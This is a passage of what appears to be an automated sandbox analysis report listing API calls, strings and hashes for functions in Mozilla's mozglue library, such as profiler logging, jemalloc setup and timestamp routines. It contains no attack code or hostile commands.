                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                  • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                  • API String ID: 16519850-1833026159
                                                                  • Opcode ID: 0e658167807e96aead50ad952b99d9ce0f048d09529733404edb537111ae1950
                                                                  • Instruction ID: fba5e7d0b1aa72c4d53d89163bb55446a76fb57b30f0dbe9e532011375971f46
                                                                  • Opcode Fuzzy Hash: 0e658167807e96aead50ad952b99d9ce0f048d09529733404edb537111ae1950
                                                                  • Instruction Fuzzy Hash: 91515C316157228FDB285F68EC2879537B9EB56318F14825EF96DC3B81C7308847C7A1
                                                                  APIs
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3E804), ref: 6C9ED047
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C9ED093
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9ED0A6
                                                                  • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6CA3E810,00000040), ref: 6C9ED0D0
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3E7B8,00001388), ref: 6C9ED147
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3E744,00001388), ref: 6C9ED162
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3E784,00001388), ref: 6C9ED18D
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3E7DC,00001388), ref: 6C9ED1B1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                                                  • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                                                  • API String ID: 2957312145-326518326
                                                                  • Opcode ID: f785d959b8a88636d126da4c74a1c9a971b11c4d1cc514abdc92d6da309e6d88
                                                                  • Instruction ID: 788b69bea8295512fb76515fef600f760036474cfb45561f1b65e7de79ed5d65
                                                                  • Opcode Fuzzy Hash: f785d959b8a88636d126da4c74a1c9a971b11c4d1cc514abdc92d6da309e6d88
                                                                  • Instruction Fuzzy Hash: 2B810371A003129FEB299F68DC68B6977B9FFAA304F148119E809D7B80D771DC46CB91
                                                                  APIs
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9C5E9D
                                                                    • Part of subcall function 6C9D5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C9D56EE,?,00000001), ref: 6C9D5B85
                                                                    • Part of subcall function 6C9D5B50: EnterCriticalSection.KERNEL32(6CA3F688,?,?,?,6C9D56EE,?,00000001), ref: 6C9D5B90
                                                                    • Part of subcall function 6C9D5B50: LeaveCriticalSection.KERNEL32(6CA3F688,?,?,?,6C9D56EE,?,00000001), ref: 6C9D5BD8
                                                                    • Part of subcall function 6C9D5B50: GetTickCount64.KERNEL32 ref: 6C9D5BE4
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9C5EAB
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9C5EB8
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9C5ECF
                                                                  • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C9C6017
                                                                    • Part of subcall function 6C9B4310: moz_xmalloc.MOZGLUE(00000010,?,6C9B42D2), ref: 6C9B436A
                                                                    • Part of subcall function 6C9B4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C9B42D2), ref: 6C9B4387
                                                                  • moz_xmalloc.MOZGLUE(00000004), ref: 6C9C5F47
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C9C5F53
                                                                  • GetCurrentThread.KERNEL32 ref: 6C9C5F5C
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C9C5F66
                                                                  • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C9C5F7E
                                                                  • moz_xmalloc.MOZGLUE(00000024), ref: 6C9C5F27
                                                                    • Part of subcall function 6C9CCA10: mozalloc_abort.MOZGLUE(?), ref: 6C9CCAA2
                                                                  • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9C55E1), ref: 6C9C5E8C
                                                                    • Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26
                                                                  • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9C55E1), ref: 6C9C605D
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9C55E1), ref: 6C9C60CC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                  • String ID: GeckoMain
                                                                  • API String ID: 3711609982-966795396
                                                                  • Opcode ID: 17df4fa22e845134dd8e5116a34d40ff4fb281a7268298f565acff64a162a3d5
                                                                  • Instruction ID: 85e51ffb8b193095c8fa9ff718dce978758b78df859cf1cf39003c33ce7ee62c
                                                                  • Opcode Fuzzy Hash: 17df4fa22e845134dd8e5116a34d40ff4fb281a7268298f565acff64a162a3d5
                                                                  • Instruction Fuzzy Hash: AA71CEB06057419FD714DF29D890A6ABBF0FF69304F14896DE48A87B52D730E889CB93
                                                                  APIs
                                                                    • Part of subcall function 6C9B31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C9B3217
                                                                    • Part of subcall function 6C9B31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C9B3236
                                                                    • Part of subcall function 6C9B31C0: FreeLibrary.KERNEL32 ref: 6C9B324B
                                                                    • Part of subcall function 6C9B31C0: __Init_thread_footer.LIBCMT ref: 6C9B3260
                                                                    • Part of subcall function 6C9B31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C9B327F
                                                                    • Part of subcall function 6C9B31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9B328E
                                                                    • Part of subcall function 6C9B31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C9B32AB
                                                                    • Part of subcall function 6C9B31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C9B32D1
                                                                    • Part of subcall function 6C9B31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C9B32E5
                                                                    • Part of subcall function 6C9B31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C9B32F7
                                                                  • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C9C9675
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9C9697
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C9C96E8
                                                                  • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C9C9707
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9C971F
                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C9C9773
                                                                  • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C9C97B7
                                                                  • FreeLibrary.KERNEL32 ref: 6C9C97D0
                                                                  • FreeLibrary.KERNEL32 ref: 6C9C97EB
                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C9C9824
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                  • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                  • API String ID: 3361784254-3880535382
                                                                  • Opcode ID: 16f51f29197625345a9dad3f0b69e7db6d6a9223f30bf2afa9afe650d8e6eeab
                                                                  • Instruction ID: 07338a6273f263b1bbf119e081ad2a1df30785f8513cf83f861d47b1be00749b
                                                                  • Opcode Fuzzy Hash: 16f51f29197625345a9dad3f0b69e7db6d6a9223f30bf2afa9afe650d8e6eeab
                                                                  • Instruction Fuzzy Hash: DA61F0717013029FDF189F68ECA8B9A7BB5EB4A318F118159E909C3790E730D855CBA2
                                                                  APIs
                                                                  • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C9C8007
                                                                  • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C9C801D
                                                                    • Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C9C802B
                                                                  • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C9C803D
                                                                  • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C9C808D
                                                                    • Part of subcall function 6C9CCA10: mozalloc_abort.MOZGLUE(?), ref: 6C9CCAA2
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C9C809B
                                                                  • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C9C80B9
                                                                  • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C9C80DF
                                                                  • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9C80ED
                                                                  • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9C80FB
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9C810D
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C9C8133
                                                                  • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C9C8149
                                                                  • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C9C8167
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C9C817C
                                                                  • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9C8199
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                  • String ID:
                                                                  • API String ID: 2721933968-0
                                                                  • Opcode ID: 35970cd4e1573b4afe5132a8f6a3f08f60c56ad8527e2fc0fd42781c8c6ba25c
                                                                  • Instruction ID: 102f70082ca19e889eadb7f7156649370305df42442342867c69415be0082c95
                                                                  • Opcode Fuzzy Hash: 35970cd4e1573b4afe5132a8f6a3f08f60c56ad8527e2fc0fd42781c8c6ba25c
                                                                  • Instruction Fuzzy Hash: 7751C6B1E002149BDB00DFA5DC84ADFB7B9EF59224F244125E815E7740E734ED05CBA2
                                                                  APIs
                                                                  • InitializeCriticalSection.KERNEL32(6CA3F618), ref: 6CA16694
                                                                  • GetThreadId.KERNEL32(?), ref: 6CA166B1
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6CA166B9
                                                                  • memset.VCRUNTIME140(?,00000000,00000100), ref: 6CA166E1
                                                                  • EnterCriticalSection.KERNEL32(6CA3F618), ref: 6CA16734
                                                                  • GetCurrentProcess.KERNEL32 ref: 6CA1673A
                                                                  • LeaveCriticalSection.KERNEL32(6CA3F618), ref: 6CA1676C
                                                                  • GetCurrentThread.KERNEL32 ref: 6CA167FC
                                                                  • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6CA16868
                                                                  • RtlCaptureContext.NTDLL ref: 6CA1687F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                  • String ID: WalkStack64
                                                                  • API String ID: 2357170935-3499369396
                                                                  • Opcode ID: caf2f78d681936aa6ed7721aca2586d7d635ecf3616f335c59afaaf4680be657
                                                                  • Instruction ID: 5c2dc5d4266bfda42c3c87b8339ec8b634ed65413354bf5bc1ce3ac29b08254e
                                                                  • Opcode Fuzzy Hash: caf2f78d681936aa6ed7721aca2586d7d635ecf3616f335c59afaaf4680be657
                                                                  • Instruction Fuzzy Hash: 35519B71A09311AFDB25CF24C844A9ABBF4FF89714F04892DF999C7B40D770D9498B92
                                                                  APIs
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
                                                                    • Part of subcall function 6C9F9420: __Init_thread_footer.LIBCMT ref: 6C9F949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FDE73
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FDF7D
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FDF8A
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FDFC9
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FDFF7
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9FE000
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C9C4A68), ref: 6C9FDE7B
                                                                    • Part of subcall function 6C9F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9F94EE
                                                                    • Part of subcall function 6C9F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9F9508
                                                                    • Part of subcall function 6C9ECBE8: GetCurrentProcess.KERNEL32(?,6C9B31A7), ref: 6C9ECBF1
                                                                    • Part of subcall function 6C9ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9B31A7), ref: 6C9ECBFA
                                                                  • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C9C4A68), ref: 6C9FDEB8
                                                                  • free.MOZGLUE(00000000,?,6C9C4A68), ref: 6C9FDEFE
                                                                  • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C9FDF38
                                                                  Strings
                                                                  • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C9FE00E
                                                                  • [I %d/%d] locked_profiler_stop, xrefs: 6C9FDE83
                                                                  • <none>, xrefs: 6C9FDFD7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                  • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                  • API String ID: 1281939033-809102171
                                                                  • Opcode ID: c793514472e75edac0a2a62a52be20b05a2c20b3bf214f5f0172a241091971b2
                                                                  • Instruction ID: f8fb5d2e01b3e4cfe89bf20d93c627ce11c88929c1e111ec2083c6871c8ae829
                                                                  • Opcode Fuzzy Hash: c793514472e75edac0a2a62a52be20b05a2c20b3bf214f5f0172a241091971b2
                                                                  • Instruction Fuzzy Hash: 7741E3327117129FEB249F68DC24BAA7776EB56308F148119E92DC7B41C731D817CBA2
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6CA0D4F0
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CA0D4FC
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CA0D52A
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6CA0D530
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CA0D53F
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CA0D55F
                                                                  • free.MOZGLUE(00000000), ref: 6CA0D585
                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CA0D5D3
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6CA0D5F9
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CA0D605
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CA0D652
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6CA0D658
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CA0D667
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CA0D6A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                  • String ID:
                                                                  • API String ID: 2206442479-0
                                                                  • Opcode ID: d062b09dd6f6be5f57ffa36a71bdf62e3d5376e8dfe103e1097973ffcf738bdc
                                                                  • Instruction ID: 4e5a011f792771ed5f328c64a94f4c443c44880419a00355fd9a806adc4095e9
                                                                  • Opcode Fuzzy Hash: d062b09dd6f6be5f57ffa36a71bdf62e3d5376e8dfe103e1097973ffcf738bdc
                                                                  • Instruction Fuzzy Hash: 01517D71A04B06DFC714DF24D894A9ABBB5FF89358F10862EE84A87750DB30E885CB91
                                                                  APIs
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C9D56D1
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9D56E9
                                                                  • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C9D56F1
                                                                  • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C9D5744
                                                                  • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C9D57BC
                                                                  • GetTickCount64.KERNEL32 ref: 6C9D58CB
                                                                  • EnterCriticalSection.KERNEL32(6CA3F688), ref: 6C9D58F3
                                                                  • __aulldiv.LIBCMT ref: 6C9D5945
                                                                  • LeaveCriticalSection.KERNEL32(6CA3F688), ref: 6C9D59B2
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6CA3F638,?,?,?,?), ref: 6C9D59E9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                  • String ID: MOZ_APP_RESTART
                                                                  • API String ID: 2752551254-2657566371
                                                                  • Opcode ID: 2685118868a04b0e87a8e65b9cc0c980f39c43ba612bd8077ce9303d52c865a9
                                                                  • Instruction ID: c0def0bd9cbef2577c8c9724eb26ec4553c69f6862e43e8f418a5cddae6e6a8b
                                                                  • Opcode Fuzzy Hash: 2685118868a04b0e87a8e65b9cc0c980f39c43ba612bd8077ce9303d52c865a9
                                                                  • Instruction Fuzzy Hash: 9BC18F71A187919FCB09CF28C85066AB7F1FF9A314F15CA5DE4C8A7660D730E886CB42
                                                                  APIs
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
                                                                    • Part of subcall function 6C9F9420: __Init_thread_footer.LIBCMT ref: 6C9F949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FEC84
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9FEC8C
                                                                    • Part of subcall function 6C9F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9F94EE
                                                                    • Part of subcall function 6C9F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9F9508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FECA1
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FECAE
                                                                  • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C9FECC5
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FED0A
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C9FED19
                                                                  • CloseHandle.KERNEL32(?), ref: 6C9FED28
                                                                  • free.MOZGLUE(00000000), ref: 6C9FED2F
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FED59
                                                                  Strings
                                                                  • [I %d/%d] profiler_ensure_started, xrefs: 6C9FEC94
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                  • String ID: [I %d/%d] profiler_ensure_started
                                                                  • API String ID: 4057186437-125001283
                                                                  • Opcode ID: 7107396dcefeaf75a855aaf160fa465836da585b7a25b7b7df6d8c4e6f6f02c2
